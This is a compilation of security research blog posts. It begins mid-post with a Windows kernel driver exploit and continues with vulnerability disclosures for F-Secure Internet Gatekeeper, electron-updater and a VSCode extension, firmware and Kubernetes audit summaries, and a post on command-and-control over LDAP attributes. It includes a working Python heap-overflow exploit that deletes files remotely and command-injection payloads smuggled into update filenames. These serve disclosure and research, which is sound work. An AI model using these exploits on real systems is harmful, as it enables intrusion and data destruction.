    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Heap Overflow in F-Secure Internet Gatekeeper

2 February 2020 at 23:00

F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

Reproduction environment setup

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: 1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

  1. (1) If you’re using an x64 version of CentOS, execute yum install glibc.i686
  2. (2) Install the Internet Gatekeeper binary using rpm -I <fsigkbin>.rpm
  3. (3) For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use GHIDRA/IDA or your favorite dissassembler/decompiler to start reverse engineering Internet Gatekeeper!

The target

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ lead us down the road of looking for memory corruption vulnerabilities which are usually common in this language.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron which uses Radamsa as the underlying engine. fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as fuzzing seed.

When analyzing the input mutated by radamsa we could quickly see that the root cause of the vulnerability revolved around the Content-length header. The generated test that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect Integer math.

After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. Later, the content length is passed to the function strtoul (String to Unsigned Long)

The following pseudo code provides a summary of the control flow:

content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
   content_len_new = strtoul(content_len_old, 0, 10);
}

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which can have a largest possible value of 2^32-1 (on 32 bit systems).

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul will return the ULONG_MAX value which corresponds to 0xFFFFFFFF on 32 bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content_length variable and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.

Malloc does allow invocations with a 0 bytes argument. When malloc(0) is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can be also read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage Malloc’s chunks of size 0x10 with an overflow of arbitrary data to override existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then subsequently spraying the heap with the full path of the file we want to delete. Internet Gatekeeper internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal which is sufficient to demonstrate the severity of the issue.

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to [email protected] ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

Resources for learning about heap exploitation

Exploit walkthroughs

GLibC walkthroughs

Tools

  • GEF - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging
  • Villoc - Visual representation of the heap in HTML

Security Analysis of the Solo Firmware

18 February 2020 at 23:00

This blogpost summarizes the result of a cooperation between SoloKeys and Doyensec, and was originally published on SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

SoloKeys firmware snippet

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person/days project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and fixed in v3.1.0. The full report is available with all details, while in this post we’d like to give a high level summary of the engagement and findings.

Why a Security Analysis, Why Now?

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The Major Finding: Downgrade Attack

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or -if attempted on a malicious site- an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.

Anatomy of the Downgrade Attack

This was the incriminated code. And this is the patch, that should help understand what happened.

Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant as this attack only allows to install older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, think of running v3.0.1, and take an old firmware - say v3.0.0. Search four bytes in it which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Firmware downgrade step 1 Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.

Firmware downgrade step 1

Fuzzing TinyCBOR with AFL

The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

Summary

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at [email protected].

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

SLAE – Assignment #3: Egghunter

By: voidsec
20 February 2020 at 15:25

Assignment #3: Egghunter This time the assignment was very interesting, here the requirements: study an egg hunting shellcode and create a working demo, it should be configurable for different payloads. As many before me, I’ve started my research journey with Skape’s papers: “Searching Process Virtual Address Space”. I was honestly amazed by the paper content, […]

The post SLAE – Assignment #3: Egghunter appeared first on VoidSec.

Signature Validation Bypass Leading to RCE In Electron-Updater

23 February 2020 at 23:00

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

Electron-Builder repository

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, they may leverage the lack of escaping to pull out a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

PoC Reproduction of the command injection by using Burp's interception feature

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder.

Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

2019 Gravitational Security Audit Results

1 March 2020 at 23:00

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack are immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and provide an independent analysis of our sources.

2019 Gravitational Security Audit Results

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.

Remote Code Execution via Malicious Auth Connector

When using our cli tools to do single sign on, we launch a browser for the user to the single sign on page. This was done by passing a url from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the url to be a non http(s) url and execute programs locally on the cli host. We’ve implemented sanitization of the url passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publically connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product as the asset storage functionality is not widely used. We’re also going move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could be only exploited using credentials from a previously authenticated client. There was no known way to exploit this vulnerability outside the cluster by non-authenticated clients.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront with to users and customers. Session recording is a great feature, however due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on Internet and I would like to help other people having the same doubt/question, it’s nothing advanced, it’s just something useful that I didn’t see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

Don't Clone That Repo: Visual Studio Code^2 Execution

15 March 2020 at 23:00

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.


The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning

VSCode pylint not installed warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

VSCode pylint not installed warning full window screenshot

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint sources and a calculator spawned. Easiest code execution ever!

VSCode behaviour is dangerous since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If found in the cloned repo, this value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.

The behavior is not in VSCode core, but rather in the Python extension. We contacted Microsoft on the 2nd October 2019, however the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

  • 1) git clone [email protected]:doyensec/VSCode_PoC_Oct2019.git
  • 2) add the cloned repo to the VSCode workspace
  • 3) open test.py in VScode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In case of a bare-bone repo like this noticing the virtualenv might be easy, but it’s clear to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder by just opening a Python file in the editor.

Disclosure Timeline

  • 2nd Oct 2019: Issue discovered
  • 2nd Oct 2019: Security advisory sent to Microsoft
  • 8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
  • 7th Jan 2020: Asked Microsoft for a resolution timeframe
  • 8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
  • 16th Mar 2020: Doyensec advisory and blog post is published

Edits

  • 17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

SLAE – Assignment #4: Custom shellcode encoder

By: voidsec
17 March 2020 at 11:08

Assignment #4: Custom Shellcode Encoder As the 4th SLAE’s assignment I was required to build a custom shellcode encoder for the execve payload, which I did, here how. Encoder Implementations I’ve decided to not relay on XORing functionalities as most antivirus solutions are now well aware of this encoding schema, the same reason for which […]

The post SLAE – Assignment #4: Custom shellcode encoder appeared first on VoidSec.

LDAPFragger: Command and Control over LDAP attributes

19 March 2020 at 10:15

Written by Rindert Kramer

Introduction

A while back during a penetration test of an internal network, we encountered physically segmented networks. These networks contained workstations joined to the same Active Directory domain, however only one network segment could connect to the internet. To control workstations in both segments remotely with Cobalt Strike, we built a tool that uses the shared Active Directory component to build a communication channel. For this, it uses the LDAP protocol which is commonly used to manage Active Directory, effectively routing beacon data over LDAP. This blogpost will go into detail about the development process, how the tool works and provides mitigation advice.

Scenario

A couple of months ago, we did a network penetration test at one of our clients. This client had multiple networks that were completely firewalled, so there was no direct connection possible between these network segments. Because of cost/workload efficiency reasons, the client chose to use the same Active Directory domain between those network segments. This is what it looked like from a high-level overview.

1

We had physical access on workstations in both segment A and segment B. In this example, workstations in segment A were able to reach the internet, while workstations in segment B could not. While we did have physical access on workstation in both network segments, we wanted to control workstations in network segment B from the internet.

Active Directory as a shared component

Both network segments were able to connect to domain controllers in the same domain and could interact with objects, authenticate users, query information and more. In Active Directory, user accounts are objects to which extra information can be added. This information is stored in attributes. By default, user accounts have write permissions on some of these attributes. For example, users can update personal information such as telephone numbers or office locations for their own account. No special privileges are needed for this, since this information is writable for the identity SELF, which is the account itself. This is configured in the Active Directory schema, as can be seen in the screenshot below.

2

Personal information, such as a telephone number or street address, is by default readable for every authenticated user in the forest. Below is a screenshot that displays the permissions for public information for the Authenticated Users identity.

3

The permissions set in the screenshot above provide access to the attributes defined in the Personal-Information property set. This property set contains 40+ attributes that users can read from and write to. The complete list of attributes can be found in the following article: https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information
By default, every user that has successfully been authenticated within the same forest is an ‘authenticated user’. This means we can use Active Directory as a temporary data store and exchange data between the two isolated networks by writing the data to these attributes and then reading the data from the other segment.
If we have access to a user account, we can use that user account in both network segments simultaneously to exchange data over Active Directory. This will work, regardless of the security settings of the workstation, since the account will communicate directly to the domain controller instead of the workstation.

To route data over LDAP we need to get code execution privileges first on workstations in both segments. To achieve this, however, is up to the reader and beyond the scope of this blogpost.
To route data over LDAP, we would write data into one of the attributes and read the data from the other network segment.
In a typical scenario where we want to execute ipconfigon a workstation in network Segment B from a workstation in network Segment A, we would write the ipconfig command into an attribute, read the ipconfig command from network segment B, execute the command and write the results back into the attribute.

This process is visualized in the following overview:

4

A sample script to utilize this can be found on our GitHub page: https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

While this works in practice to communicate between segmented networks over Active Directory, this solution is not ideal. For example, this channel depends on the replication of data between domain controllers. If you write a message to domain controller A, but read the message from domain controller B, you might have to wait for the domain controllers to replicate in order to get the data. In addition, in the example above we used to info-attribute to exchange data over Active Directory. This attribute can hold up to 1024 bytes of information. But what if the payload exceeds that size? More issues like these made this solution not an ideal one.

Lastly, people already built some proof of concepts doing the exact same thing. Harmj0y wrote an excellent blogpost about this technique: https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

That is why we decided to build an advanced LDAP communication channel that fixes these issues.

Building an advanced LDAP channel

In the example above, the info-attribute is used. This is not an ideal solution, because what if the attribute already contains data or if the data ends up in a GUI somewhere?

To find other attributes, all attributes from the Active Directory schema are queried and:

  • Checked if the attribute contains data;
  • If the user has write permissions on it;
  • If the contents can be cleared.

If this all checks out, the name and the maximum length of the attribute is stored in an array for later usage.

Visually, the process flow would look like this:

5

As for (payload) data not ending up somewhere in a GUI such as an address book, we did not find a reliable way to detect whether an attribute ends up in a GUI or not, so attributes such as telephoneNumber are added to an in-code blacklist. For now, the attribute with the highest maximum length is selected from the array with suitable attributes, for speed and efficiency purposes. We refer to this attribute as the ‘data-attribute’ for the rest of this blogpost.

Sharing the attribute name
Now that we selected the data-attribute, we need to find a way to share the name of this attribute from the sending network segment to the receiving side. As we want the LDAP channel to be as stealthy as possible, we did not want to share the name of the chosen attribute directly.

In order to overcome this hurdle we decided to use hashing. As mentioned, all attributes were queried in order to select a suitable attribute to exchange data over LDAP. These attributes are stored in a hashtable, together with the CRC representation of the attribute name. If this is done in both network segments, we can share the hash instead of the attribute name, since the hash will resolve to the actual name of the attribute, regardless where the tool is used in the domain.

Avoiding replication issues
Chances are that the transfer rate of the LDAP channel is higher than the replication occurrence between domain controllers. The easy fix for this is to communicate to the same domain controller.
That means that one of the clients has to select a domain controller and communicate the name of the domain controller to the other client over LDAP.

